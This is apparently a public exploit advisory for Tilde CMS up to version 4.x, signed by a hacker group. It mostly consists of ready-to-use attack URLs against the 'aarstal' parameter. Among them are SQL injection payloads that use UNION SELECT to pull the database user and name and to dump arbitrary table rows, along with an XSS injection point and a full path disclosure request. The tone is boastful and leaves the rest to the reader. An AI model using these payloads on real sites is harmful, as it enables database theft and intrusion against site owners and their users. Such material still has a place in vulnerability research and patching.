|
---------------------------------------------------------------=0D ____ __________ __ ____ __ =0D /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ =0D | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\=0D | | | \ | |/ \ \___| | /_____/ | || | =0D |___|___| /\__| /______ /\___ >__| |___||__| =0D \/\______| \/ \/ =0D ---------------------------------------------------------------=0D =0D Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org =0D =0D ---------------------------------------------------------------=0D =0D Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection=0D =0D ---------------------------------------------------------------=0D =0D #By KiNgOfThEwOrLd =0D =0D ---------------------------------------------------------------=0D PoC=0D =0D D'u need an explanation?!? i don't think so :P=0D ---------------------------------------------------------------=0D SQL Injection=0D =0D http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=%27=0D =0D Little examples=0D =0D Using user() and database() functions u can get some informations about the database...as:=0D =0D http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*=0D =0D Or u can get some recordes by the database like:=0D =0D http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]/**/from/**/[table_name]/*=0D =0D D'u want the tables n' the rows? Find it yourself ;P=0D ---------------------------------------------------------------=0D something else..=0D =0D Xss Vulnerability=0D =0D http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=[XSS]=0D ---------------------------------------------------------------=0D Full Path Disclosure=0D =0D http://[target]/[tilde_path]/index.php?search=%3C&mode=search&sider=on&tss=on&linier=on=0D ---------------------------------------------------------------=0D